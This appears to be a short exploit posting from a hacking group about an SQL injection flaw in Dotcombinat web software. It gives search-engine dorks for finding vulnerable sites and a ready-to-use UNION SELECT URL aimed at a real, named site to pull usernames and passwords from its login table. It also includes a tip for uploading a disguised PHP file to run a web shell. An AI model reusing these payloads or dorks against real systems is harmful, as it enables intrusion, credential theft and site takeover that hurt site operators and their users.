-------------------- IN The NAme OF God --------------------


-====Dotcombinat Remote Sql Injection Vulnerability====-


#################################################################
#
#
# Exploit Title: Dotcombinat Remote Sql Injection Vulnerability
#
# Exploit Author: Mr.XpR
#
# SCript Download : http://www.dotcombinat.net
#
# Tested on: BackTrack , 7 , Redhat
#
# MAil : No0pm@yahoo.com
#
#
#################################################################


-====Dork====-

intext:webdesign: dotcombinat berlin inurl:?id=

intext:webdesign: dotcombinat

-====Exploit====-

http://Site.C0M/detail.php?id=[Sqli]

-====Example====-

http://www.gretchen-club.de/detail.php?id=-116+union+select+1,2,3,group_concat%28name,0x3a,passwort%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+login

-====information====-

This metod is sql injection with no Sql error 

And Upload Image ==> 1.php.jpg and run shell

-====Tnx To====-

Persian Gulf For Ever ~~~~ > W3 Are Persian Hackerz

MR.XpR - MMT - Samim.s - FarbodEZRaeL - MR.F@rdin- Inj3Ctor - Black.Viper - UnknowN 

Yaghi.Vahshi - HELLBOY - IrIsT - Black King - Monfared - Sokote_Vahshat ...

And All IraNHAck Security Team Members IRANHaCK.ORG